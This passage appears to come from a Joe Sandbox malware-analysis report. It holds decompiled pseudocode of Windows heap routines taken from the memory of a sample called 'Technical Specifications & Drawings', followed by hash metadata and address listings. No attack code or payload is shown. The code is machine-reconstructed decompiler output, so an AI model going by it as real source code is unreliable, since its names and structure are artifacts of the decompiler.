                                                  				_t82 = E017C7D50();
                                                  				_t125 = 0x7ffe038a;
                                                  				if(_t82 != 0) {
                                                  					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                  				} else {
                                                  					_t85 = 0x7ffe038a;
                                                  				}
                                                  				if( *_t85 != 0) {
                                                  					__eflags = E017C7D50();
                                                  					if(__eflags != 0) {
                                                  						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                  						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                  					}
                                                  					E01861582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                  				}
                                                  				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                  				_t91 =  *(_t103 + 2);
                                                  				if((_t91 & 0x00000004) != 0) {
                                                  					E017FD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                  					_t91 =  *(_t103 + 2);
                                                  				}
                                                  				 *(_t103 + 2) = _t91 & 0x00000017;
                                                  				_t65 = 1;
                                                  				goto L13;
                                                  			}

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 2994545307-2586055223
                                                  • Opcode ID: 93e50f7063bf8f1ec4e017340f61d9874c4de75cf26d205a714300267850c325
                                                  • Instruction ID: e4285b900a3f1d50b82a18970ee995e805c9bb68a39cf0f28db732f6742338dd
                                                  • Opcode Fuzzy Hash: 93e50f7063bf8f1ec4e017340f61d9874c4de75cf26d205a714300267850c325
                                                  • Instruction Fuzzy Hash: 085106722056959FE722DB68C84CF67B7E9FF84B50F08056CF651CB292E724DA40CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                  • API String ID: 2994545307-336120773
                                                  • Opcode ID: 5da75cc37793a3116dd0941c0884455c235083ae8fff5ff4a7246a1943d39562
                                                  • Instruction ID: eba1abe51a64da80aca31c531be46446931539ec34a35d6a106b20279c64cf4b
                                                  • Opcode Fuzzy Hash: 5da75cc37793a3116dd0941c0884455c235083ae8fff5ff4a7246a1943d39562
                                                  • Instruction Fuzzy Hash: 0231FE31240205FFD721DB9DD889F6EB7ECEB04726F24426AF505CB291E670AA40CA69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E017C99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                                  				char _v5;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed short _v20;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				signed short _t186;
                                                  				intOrPtr _t187;
                                                  				signed short _t190;
                                                  				signed int _t196;
                                                  				signed short _t197;
                                                  				intOrPtr _t203;
                                                  				signed int _t207;
                                                  				signed int _t210;
                                                  				signed short _t215;
                                                  				intOrPtr _t216;
                                                  				signed short _t219;
                                                  				signed int _t221;
                                                  				signed short _t222;
                                                  				intOrPtr _t228;
                                                  				signed int _t232;
                                                  				signed int _t235;
                                                  				signed int _t250;
                                                  				signed short _t251;
                                                  				intOrPtr _t252;
                                                  				signed short _t254;
                                                  				intOrPtr _t255;
                                                  				signed int _t258;
                                                  				signed int _t259;
                                                  				signed short _t262;
                                                  				intOrPtr _t271;
                                                  				signed int _t279;
                                                  				signed int _t282;
                                                  				signed int _t284;
                                                  				signed int _t286;
                                                  				intOrPtr _t292;
                                                  				signed int _t296;
                                                  				signed int _t299;
                                                  				signed int _t307;
                                                  				signed int* _t309;
                                                  				signed short* _t311;
                                                  				signed short* _t313;
                                                  				signed char _t314;
                                                  				intOrPtr _t316;
                                                  				signed int _t323;
                                                  				signed char _t328;
                                                  				signed short* _t330;
                                                  				signed char _t331;
                                                  				intOrPtr _t335;
                                                  				signed int _t342;
                                                  				signed char _t347;
                                                  				signed short* _t348;
                                                  				signed short* _t350;
                                                  				signed short _t352;
                                                  				signed char _t354;
                                                  				intOrPtr _t357;
                                                  				intOrPtr* _t364;
                                                  				signed char _t365;
                                                  				intOrPtr _t366;
                                                  				signed int _t373;
                                                  				signed char _t378;
                                                  				signed int* _t381;
                                                  				signed int _t382;
                                                  				signed short _t384;
                                                  				signed int _t386;
                                                  				unsigned int _t390;
                                                  				signed int _t393;
                                                  				signed int* _t394;
                                                  				unsigned int _t398;
                                                  				signed short _t400;
                                                  				signed short _t402;
                                                  				signed int _t404;
                                                  				signed int _t407;
                                                  				unsigned int _t411;
                                                  				signed short* _t414;
                                                  				signed int _t415;
                                                  				signed short* _t419;
                                                  				signed int* _t420;
                                                  				void* _t421;
                                                  
                                                  				_t414 = __edx;
                                                  				_t307 = __ecx;
                                                  				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                                  				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                                  					_v5 = _a8;
                                                  					L3:
                                                  					_t381 = _a4;
                                                  					goto L4;
                                                  				} else {
                                                  					__eflags =  *(__ecx + 0x4c);
                                                  					if( *(__ecx + 0x4c) != 0) {
                                                  						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                                  						 *_t419 = _t411;
                                                  						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                                  						__eflags = _t411 >> 0x18 - _t378;
                                                  						if(__eflags != 0) {
                                                  							_push(_t378);
                                                  							E0185FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                                  						}
                                                  					}
                                                  					_t250 = _a8;
                                                  					_v5 = _t250;
                                                  					__eflags = _t250;
                                                  					if(_t250 != 0) {
                                                  						_t400 = _t414[6];
                                                  						_t53 =  &(_t414[4]); // -16
                                                  						_t348 = _t53;
                                                  						_t251 =  *_t348;
                                                  						_v12 = _t251;
                                                  						_v16 = _t400;
                                                  						_t252 =  *((intOrPtr*)(_t251 + 4));
                                                  						__eflags =  *_t400 - _t252;
                                                  						if( *_t400 != _t252) {
                                                  							L49:
                                                  							_push(_t348);
                                                  							_push( *_t400);
                                                  							E0186A80D(_t307, 0xd, _t348, _t252);
                                                  							L50:
                                                  							_v5 = 0;
                                                  							goto L11;
                                                  						}
                                                  						__eflags =  *_t400 - _t348;
                                                  						if( *_t400 != _t348) {
                                                  							goto L49;
                                                  						}
                                                  						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                  						_t407 =  *(_t307 + 0xb4);
                                                  						__eflags = _t407;
                                                  						if(_t407 == 0) {
                                                  							L36:
                                                  							_t364 = _v16;
                                                  							_t282 = _v12;
                                                  							 *_t364 = _t282;
                                                  							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                                  							__eflags = _t414[1] & 0x00000008;
                                                  							if((_t414[1] & 0x00000008) == 0) {
                                                  								L39:
                                                  								_t365 = _t414[1];
                                                  								__eflags = _t365 & 0x00000004;
                                                  								if((_t365 & 0x00000004) != 0) {
                                                  									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                  									_v12 = _t284;
                                                  									__eflags = _t365 & 0x00000002;
                                                  									if((_t365 & 0x00000002) != 0) {
                                                  										__eflags = _t284 - 4;
                                                  										if(_t284 > 4) {
                                                  											_t284 = _t284 - 4;
                                                  											__eflags = _t284;
                                                  											_v12 = _t284;
                                                  										}
                                                  									}
                                                  									_t78 =  &(_t414[8]); // -8
                                                  									_t286 = E017FD540(_t78, _t284, 0xfeeefeee);
                                                  									_v16 = _t286;
                                                  									__eflags = _t286 - _v12;
                                                  									if(_t286 != _v12) {
                                                  										_t366 =  *[fs:0x30];
                                                  										__eflags =  *(_t366 + 0xc);
                                                  										if( *(_t366 + 0xc) == 0) {
                                                  											_push("HEAP: ");
                                                  											E017AB150();
                                                  										} else {
                                                  											E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  										}
                                                  										_push(_v16 + 0x10 + _t414);
                                                  										E017AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                  										_t292 =  *[fs:0x30];
                                                  										_t421 = _t421 + 0xc;
                                                  										__eflags =  *((char*)(_t292 + 2));
                                                  										if( *((char*)(_t292 + 2)) != 0) {
                                                  											 *0x1896378 = 1;
                                                  											asm("int3");
                                                  											 *0x1896378 = 0;
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L50;
                                                  							}
                                                  							_t296 = E017CA229(_t307, _t414);
                                                  							__eflags = _t296;
                                                  							if(_t296 != 0) {
                                                  								goto L39;
                                                  							} else {
                                                  								E017CA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                  								goto L50;
                                                  							}
                                                  						} else {
                                                  							_t373 =  *_t414 & 0x0000ffff;
                                                  							while(1) {
                                                  								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                                  								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                                  									_t301 = _t373;
                                                  									break;
                                                  								}
                                                  								_t299 =  *_t407;
                                                  								__eflags = _t299;
                                                  								if(_t299 == 0) {
                                                  									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                  									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                  									break;
                                                  								} else {
                                                  									_t407 = _t299;
                                                  									continue;
                                                  								}
                                                  							}
                                                  							_t62 =  &(_t414[4]); // -16
                                                  							E017CBC04(_t307, _t407, 1, _t62, _t301, _t373);
                                                  							goto L36;
                                                  						}
                                                  					}
                                                  					L11:
                                                  					_t402 = _t419[6];
                                                  					_t25 =  &(_t419[4]); // -16
                                                  					_t350 = _t25;
                                                  					_t254 =  *_t350;
                                                  					_v12 = _t254;
                                                  					_v20 = _t402;
                                                  					_t255 =  *((intOrPtr*)(_t254 + 4));
                                                  					__eflags =  *_t402 - _t255;
                                                  					if( *_t402 != _t255) {
                                                  						L61:
                                                  						_push(_t350);
                                                  						_push( *_t402);
                                                  						E0186A80D(_t307, 0xd, _t350, _t255);
                                                  						goto L3;
                                                  					}
                                                  					__eflags =  *_t402 - _t350;
                                                  					if( *_t402 != _t350) {
                                                  						goto L61;
                                                  					}
                                                  					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                                  					_t404 =  *(_t307 + 0xb4);
                                                  					__eflags = _t404;
                                                  					if(_t404 == 0) {
                                                  						L20:
                                                  						_t352 = _v20;
                                                  						_t258 = _v12;
                                                  						 *_t352 = _t258;
                                                  						 *(_t258 + 4) = _t352;
                                                  						__eflags = _t419[1] & 0x00000008;
                                                  						if((_t419[1] & 0x00000008) != 0) {
                                                  							_t259 = E017CA229(_t307, _t419);
                                                  							__eflags = _t259;
                                                  							if(_t259 != 0) {
                                                  								goto L21;
                                                  							} else {
                                                  								E017CA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                                  								goto L3;
                                                  							}
                                                  						}
                                                  						L21:
                                                  						_t354 = _t419[1];
                                                  						__eflags = _t354 & 0x00000004;
                                                  						if((_t354 & 0x00000004) != 0) {
                                                  							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                                  							__eflags = _t354 & 0x00000002;
                                                  							if((_t354 & 0x00000002) != 0) {
                                                  								__eflags = _t415 - 4;
                                                  								if(_t415 > 4) {
                                                  									_t415 = _t415 - 4;
                                                  									__eflags = _t415;
                                                  								}
                                                  							}
                                                  							_t91 =  &(_t419[8]); // -8
                                                  							_t262 = E017FD540(_t91, _t415, 0xfeeefeee);
                                                  							_v20 = _t262;
                                                  							__eflags = _t262 - _t415;
                                                  							if(_t262 != _t415) {
                                                  								_t357 =  *[fs:0x30];
                                                  								__eflags =  *(_t357 + 0xc);
                                                  								if( *(_t357 + 0xc) == 0) {
                                                  									_push("HEAP: ");
                                                  									E017AB150();
                                                  								} else {
                                                  									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  								}
                                                  								_push(_v20 + 0x10 + _t419);
                                                  								E017AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                                  								_t271 =  *[fs:0x30];
                                                  								_t421 = _t421 + 0xc;
                                                  								__eflags =  *((char*)(_t271 + 2));
                                                  								if( *((char*)(_t271 + 2)) != 0) {
                                                  									 *0x1896378 = 1;
                                                  									asm("int3");
                                                  									 *0x1896378 = 0;
                                                  								}
                                                  							}
                                                  						}
                                                  						_t381 = _a4;
                                                  						_t414 = _t419;
                                                  						_t419[1] = 0;
                                                  						_t419[3] = 0;
                                                  						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                                  						 *_t419 =  *_t381;
                                                  						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                                  						L4:
                                                  						_t420 = _t414 +  *_t381 * 8;
                                                  						if( *(_t307 + 0x4c) == 0) {
                                                  							L6:
                                                  							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                                  								__eflags =  *(_t307 + 0x4c);
                                                  								if( *(_t307 + 0x4c) != 0) {
                                                  									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                                  									 *_t420 = _t390;
                                                  									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                                  									__eflags = _t390 >> 0x18 - _t328;
                                                  									if(__eflags != 0) {
                                                  										_push(_t328);
                                                  										E0185FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                                  									}
                                                  								}
                                                  								__eflags = _v5;
                                                  								if(_v5 == 0) {
                                                  									L94:
                                                  									_t382 = _t420[3];
                                                  									_t137 =  &(_t420[2]); // -16
                                                  									_t309 = _t137;
                                                  									_t186 =  *_t309;
                                                  									_v20 = _t186;
                                                  									_v16 = _t382;
                                                  									_t187 =  *((intOrPtr*)(_t186 + 4));
                                                  									__eflags =  *_t382 - _t187;
                                                  									if( *_t382 != _t187) {
                                                  										L63:
                                                  										_push(_t309);
                                                  										_push( *_t382);
                                                  										_push(_t187);
                                                  										_push(_t309);
                                                  										_push(0xd);
                                                  										L64:
                                                  										E0186A80D(_t307);
                                                  										continue;
                                                  									}
                                                  									__eflags =  *_t382 - _t309;
                                                  									if( *_t382 != _t309) {
                                                  										goto L63;
                                                  									}
                                                  									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                                  									_t393 =  *(_t307 + 0xb4);
                                                  									__eflags = _t393;
                                                  									if(_t393 == 0) {
                                                  										L104:
                                                  										_t330 = _v16;
                                                  										_t190 = _v20;
                                                  										 *_t330 = _t190;
                                                  										 *(_t190 + 4) = _t330;
                                                  										__eflags = _t420[0] & 0x00000008;
                                                  										if((_t420[0] & 0x00000008) == 0) {
                                                  											L107:
                                                  											_t331 = _t420[0];
                                                  											__eflags = _t331 & 0x00000004;
                                                  											if((_t331 & 0x00000004) != 0) {
                                                  												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                                  												_v12 = _t196;
                                                  												__eflags = _t331 & 0x00000002;
                                                  												if((_t331 & 0x00000002) != 0) {
                                                  													__eflags = _t196 - 4;
                                                  													if(_t196 > 4) {
                                                  														_t196 = _t196 - 4;
                                                  														__eflags = _t196;
                                                  														_v12 = _t196;
                                                  													}
                                                  												}
                                                  												_t162 =  &(_t420[4]); // -8
                                                  												_t197 = E017FD540(_t162, _t196, 0xfeeefeee);
                                                  												_v20 = _t197;
                                                  												__eflags = _t197 - _v12;
                                                  												if(_t197 != _v12) {
                                                  													_t335 =  *[fs:0x30];
                                                  													__eflags =  *(_t335 + 0xc);
                                                  													if( *(_t335 + 0xc) == 0) {
                                                  														_push("HEAP: ");
                                                  														E017AB150();
                                                  													} else {
                                                  														E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  													}
                                                  													_push(_v20 + 0x10 + _t420);
                                                  													E017AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                                  													_t203 =  *[fs:0x30];
                                                  													__eflags =  *((char*)(_t203 + 2));
                                                  													if( *((char*)(_t203 + 2)) != 0) {
                                                  														 *0x1896378 = 1;
                                                  														asm("int3");
                                                  														 *0x1896378 = 0;
                                                  													}
                                                  												}
                                                  											}
                                                  											_t394 = _a4;
                                                  											_t414[1] = 0;
                                                  											_t414[3] = 0;
                                                  											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                                  											 *_t414 =  *_t394;
                                                  											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                                  											break;
                                                  										}
                                                  										_t207 = E017CA229(_t307, _t420);
                                                  										__eflags = _t207;
                                                  										if(_t207 != 0) {
                                                  											goto L107;
                                                  										}
                                                  										E017CA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                                  										continue;
                                                  									}
                                                  									_t342 =  *_t420 & 0x0000ffff;
                                                  									while(1) {
                                                  										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                                  										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                                  											break;
                                                  										}
                                                  										_t210 =  *_t393;
                                                  										__eflags = _t210;
                                                  										if(_t210 == 0) {
                                                  											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                  											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                  											L103:
                                                  											_t146 =  &(_t420[2]); // -16
                                                  											E017CBC04(_t307, _t393, 1, _t146, _t212, _t342);
                                                  											goto L104;
                                                  										}
                                                  										_t393 = _t210;
                                                  									}
                                                  									_t212 = _t342;
                                                  									goto L103;
                                                  								} else {
                                                  									_t384 = _t414[6];
                                                  									_t102 =  &(_t414[4]); // -16
                                                  									_t311 = _t102;
                                                  									_t215 =  *_t311;
                                                  									_v20 = _t215;
                                                  									_v16 = _t384;
                                                  									_t216 =  *((intOrPtr*)(_t215 + 4));
                                                  									__eflags =  *_t384 - _t216;
                                                  									if( *_t384 != _t216) {
                                                  										L92:
                                                  										_push(_t311);
                                                  										_push( *_t384);
                                                  										E0186A80D(_t307, 0xd, _t311, _t216);
                                                  										L93:
                                                  										_v5 = 0;
                                                  										goto L94;
                                                  									}
                                                  									__eflags =  *_t384 - _t311;
                                                  									if( *_t384 != _t311) {
                                                  										goto L92;
                                                  									}
                                                  									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                  									_t386 =  *(_t307 + 0xb4);
                                                  									__eflags = _t386;
                                                  									if(_t386 == 0) {
                                                  										L79:
                                                  										_t313 = _v16;
                                                  										_t219 = _v20;
                                                  										 *_t313 = _t219;
                                                  										 *(_t219 + 4) = _t313;
                                                  										__eflags = _t414[1] & 0x00000008;
                                                  										if((_t414[1] & 0x00000008) == 0) {
                                                  											L82:
                                                  											_t314 = _t414[1];
                                                  											__eflags = _t314 & 0x00000004;
                                                  											if((_t314 & 0x00000004) != 0) {
                                                  												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                  												_v12 = _t221;
                                                  												__eflags = _t314 & 0x00000002;
                                                  												if((_t314 & 0x00000002) != 0) {
                                                  													__eflags = _t221 - 4;
                                                  													if(_t221 > 4) {
                                                  														_t221 = _t221 - 4;
                                                  														__eflags = _t221;
                                                  														_v12 = _t221;
                                                  													}
                                                  												}
                                                  												_t127 =  &(_t414[8]); // -8
                                                  												_t222 = E017FD540(_t127, _t221, 0xfeeefeee);
                                                  												_v20 = _t222;
                                                  												__eflags = _t222 - _v12;
                                                  												if(_t222 != _v12) {
                                                  													_t316 =  *[fs:0x30];
                                                  													__eflags =  *(_t316 + 0xc);
                                                  													if( *(_t316 + 0xc) == 0) {
                                                  														_push("HEAP: ");
                                                  														E017AB150();
                                                  													} else {
                                                  														E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  													}
                                                  													_push(_v20 + 0x10 + _t414);
                                                  													E017AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                  													_t228 =  *[fs:0x30];
                                                  													_t421 = _t421 + 0xc;
                                                  													__eflags =  *((char*)(_t228 + 2));
                                                  													if( *((char*)(_t228 + 2)) != 0) {
                                                  														 *0x1896378 = 1;
                                                  														asm("int3");
                                                  														 *0x1896378 = 0;
                                                  													}
                                                  												}
                                                  											}
                                                  											goto L93;
                                                  										}
                                                  										_t232 = E017CA229(_t307, _t414);
                                                  										__eflags = _t232;
                                                  										if(_t232 != 0) {
                                                  											goto L82;
                                                  										}
                                                  										E017CA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                  										goto L93;
                                                  									}
                                                  									_t323 =  *_t414 & 0x0000ffff;
                                                  									while(1) {
                                                  										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                                  										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                                  											break;
                                                  										}
                                                  										_t235 =  *_t386;
                                                  										__eflags = _t235;
                                                  										if(_t235 == 0) {
                                                  											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                  											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                  											L78:
                                                  											_t111 =  &(_t414[4]); // -16
                                                  											E017CBC04(_t307, _t386, 1, _t111, _t237, _t323);
                                                  											goto L79;
                                                  										}
                                                  										_t386 = _t235;
                                                  									}
                                                  									_t237 = _t323;
                                                  									goto L78;
                                                  								}
                                                  							}
                                                  							return _t414;
                                                  						}
                                                  						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                                  						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                                  						if(_t398 >> 0x18 != _t347) {
                                                  							_push(_t347);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(_t420);
                                                  							_push(3);
                                                  							goto L64;
                                                  						}
                                                  						goto L6;
                                                  					} else {
                                                  						_t277 =  *_t419 & 0x0000ffff;
                                                  						_v16 = _t277;
                                                  						while(1) {
                                                  							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                                  							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                                  								break;
                                                  							}
                                                  							_t279 =  *_t404;
                                                  							__eflags = _t279;
                                                  							if(_t279 == 0) {
                                                  								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                  								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                  								break;
                                                  							} else {
                                                  								_t404 = _t279;
                                                  								_t277 =  *_t419 & 0x0000ffff;
                                                  								continue;
                                                  							}
                                                  						}
                                                  						E017CBC04(_t307, _t404, 1, _t350, _t277, _v16);
                                                  						goto L20;
                                                  					}
                                                  				}
                                                  			}

                                                  0x0181157c
                                                  0x01811582
                                                  0x01811585
                                                  0x01811589
                                                  0x0181158b
                                                  0x01811592
                                                  0x01811593
                                                  0x01811593
                                                  0x01811589
                                                  0x01811530
                                                  0x00000000
                                                  0x018114f8
                                                  0x018114d5
                                                  0x018114da
                                                  0x018114dc
                                                  0x00000000
                                                  0x018114de
                                                  0x018114e8
                                                  0x00000000
                                                  0x018114e8
                                                  0x01811497
                                                  0x01811497
                                                  0x018114a4
                                                  0x018114a4
                                                  0x018114a7
                                                  0x018114a9
                                                  0x018114ab
                                                  0x018114ab
                                                  0x0181149c
                                                  0x0181149e
                                                  0x018114a0
                                                  0x018114b0
                                                  0x018114b0
                                                  0x00000000
                                                  0x018114a2
                                                  0x018114a2
                                                  0x00000000
                                                  0x018114a2
                                                  0x018114a0
                                                  0x018114b3
                                                  0x018114bb
                                                  0x00000000
                                                  0x018114bb
                                                  0x01811495
                                                  0x017c9a7c
                                                  0x017c9a7c
                                                  0x017c9a7f
                                                  0x017c9a7f
                                                  0x017c9a82
                                                  0x017c9a84
                                                  0x017c9a87
                                                  0x017c9a8a
                                                  0x017c9a8d
                                                  0x017c9a8f
                                                  0x0181166a
                                                  0x0181166a
                                                  0x0181166b
                                                  0x01811674
                                                  0x00000000
                                                  0x01811674
                                                  0x017c9a95
                                                  0x017c9a97
                                                  0x00000000
                                                  0x00000000
                                                  0x017c9aa0
                                                  0x017c9aa3
                                                  0x017c9aa9
                                                  0x017c9aab
                                                  0x017c9ad7
                                                  0x017c9ad7
                                                  0x017c9ada
                                                  0x017c9add
                                                  0x017c9adf
                                                  0x017c9ae2
                                                  0x017c9ae6
                                                  0x017c9b22
                                                  0x017c9b27
                                                  0x017c9b29
                                                  0x00000000
                                                  0x017c9b2b
                                                  0x018115be
                                                  0x00000000
                                                  0x018115be
                                                  0x017c9b29
                                                  0x017c9ae8
                                                  0x017c9ae8
                                                  0x017c9aeb
                                                  0x017c9aee
                                                  0x018115cb
                                                  0x018115d2
                                                  0x018115d5
                                                  0x018115d7
                                                  0x018115da
                                                  0x018115dc
                                                  0x018115dc
                                                  0x018115dc
                                                  0x018115da
                                                  0x018115e5
                                                  0x018115e9
                                                  0x018115ee
                                                  0x018115f1
                                                  0x018115f3
                                                  0x018115f9
                                                  0x01811600
                                                  0x01811604
                                                  0x01811624
                                                  0x01811629
                                                  0x01811606
                                                  0x0181161c
                                                  0x01811621
                                                  0x01811637
                                                  0x0181163e
                                                  0x01811643
                                                  0x01811649
                                                  0x0181164c
                                                  0x01811650
                                                  0x01811656
                                                  0x0181165d
                                                  0x0181165e
                                                  0x0181165e
                                                  0x01811650
                                                  0x018115f3
                                                  0x017c9af4
                                                  0x017c9af7
                                                  0x017c9afc
                                                  0x017c9b00
                                                  0x017c9b04
                                                  0x017c9b08
                                                  0x017c9b14
                                                  0x017c99fe
                                                  0x017c9a04
                                                  0x017c9a07
                                                  0x00000000
                                                  0x017c9a29
                                                  0x0181169c
                                                  0x018116a0
                                                  0x018116a5
                                                  0x018116a9
                                                  0x018116b5
                                                  0x018116ba
                                                  0x018116bc
                                                  0x018116be
                                                  0x018116c3
                                                  0x018116c3
                                                  0x018116bc
                                                  0x018116c8
                                                  0x018116cc
                                                  0x0181181b
                                                  0x0181181b
                                                  0x0181181e
                                                  0x0181181e
                                                  0x01811821
                                                  0x01811823
                                                  0x01811826
                                                  0x01811829
                                                  0x0181182c
                                                  0x0181182e
                                                  0x01811688
                                                  0x01811688
                                                  0x01811689
                                                  0x0181168b
                                                  0x0181168c
                                                  0x0181168d
                                                  0x0181168f
                                                  0x01811692
                                                  0x00000000
                                                  0x01811692
                                                  0x01811834
                                                  0x01811836
                                                  0x00000000
                                                  0x00000000
                                                  0x0181183f
                                                  0x01811842
                                                  0x01811848
                                                  0x0181184a
                                                  0x01811875
                                                  0x01811875
                                                  0x01811878
                                                  0x0181187b
                                                  0x0181187d
                                                  0x01811880
                                                  0x01811884
                                                  0x018118a7
                                                  0x018118a7
                                                  0x018118aa
                                                  0x018118ad
                                                  0x018118b6
                                                  0x018118bd
                                                  0x018118c0
                                                  0x018118c3
                                                  0x018118c5
                                                  0x018118c8
                                                  0x018118ca
                                                  0x018118ca
                                                  0x018118cd
                                                  0x018118cd
                                                  0x018118c8
                                                  0x018118d5
                                                  0x018118da
                                                  0x018118df
                                                  0x018118e2
                                                  0x018118e5
                                                  0x018118e7
                                                  0x018118ee
                                                  0x018118f2
                                                  0x01811912
                                                  0x01811917
                                                  0x018118f4
                                                  0x0181190a
                                                  0x0181190f
                                                  0x01811925
                                                  0x0181192c
                                                  0x01811931
                                                  0x0181193a
                                                  0x0181193e
                                                  0x01811940
                                                  0x01811947
                                                  0x01811948
                                                  0x01811948
                                                  0x0181193e
                                                  0x018118e5
                                                  0x0181194f
                                                  0x01811952
                                                  0x01811956
                                                  0x0181195d
                                                  0x01811961
                                                  0x0181196d
                                                  0x00000000
                                                  0x0181196d
                                                  0x0181188a
                                                  0x0181188f
                                                  0x01811891
                                                  0x00000000
                                                  0x00000000
                                                  0x0181189d
                                                  0x00000000
                                                  0x0181189d
                                                  0x0181184c
                                                  0x01811859
